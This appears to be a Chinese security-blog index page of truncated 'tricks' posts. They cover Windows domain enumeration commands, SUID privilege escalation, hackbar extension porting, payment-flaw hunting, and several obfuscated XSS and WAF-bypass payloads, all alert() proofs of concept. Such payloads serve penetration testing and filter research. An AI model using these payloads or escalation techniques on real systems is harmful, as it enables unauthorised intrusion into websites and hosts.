1.域常用操作命令:net group /domain//获得所有域用户组列表net group qq_group /domain//显示域中qq_g...
【奇技淫巧】利用suid进行提权
首先创建一个普通用户test,是一个普通用户的权限(即最低权限的用户),并利用su切换进test用户,利用id可以查看权限:利用suid进行提权的话,需要先找到设置了suid的可执行文件,find /...
【奇技淫巧】Firefox插件 hackbar搬家到chrome 拒绝收费
大家都知道hackbar在谷歌插件里面是收费的,且网上也有相应的教程来破解它,但是使用后总是出现这样那样的问题导致插件不能继续正常使用,今天我无事就来玩玩它。第一步:我们先去把火狐里面那个免费使用的h...
奇技淫巧(5) - XSS payload
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script><script>...
奇技淫巧(3) - XSS payload
<%00EEEE<svg ////ONLoad='au006cu0065u0072u0074(1)'///>svg>%0APayload 本文始发于微信公众号(Khan安全团队...
奇技淫巧(4) - XSS payload
<html " onmouseover=/*<svg/*/onload=alert(2)//> 本文始发于微信公众号(Khan安全团队):奇技淫巧(4) - XSS payl...
奇技淫巧(11) - XSS payload
多语言有效负载: "jaVasCript:/*-/*`/*`/*'/*"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//&l...
奇技淫巧(10) - XSS payload
XSS WAF绕过: 在JS上下文中进行反射,允许使用单引号<, > ==> REMOV...
奇技淫巧(6) - XSS payload
/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</s...
奇技淫巧(2) - XSS payload
%ff<!---><svg/onload=top[/al/.source+/ert/....
【奇技淫巧】挖掘网站支付漏洞中突然想到的一个骚思路
对一个产商做渗透测试已经三天了,大大小小的传统、逻辑漏洞已经挖掘的差不多了,抱着最后在试一试的心态,于是认真把整个购物的流程仔细分析了一次,就有了下面这个案例。截图比较模糊,师傅们将就着看看哈&nbs...
7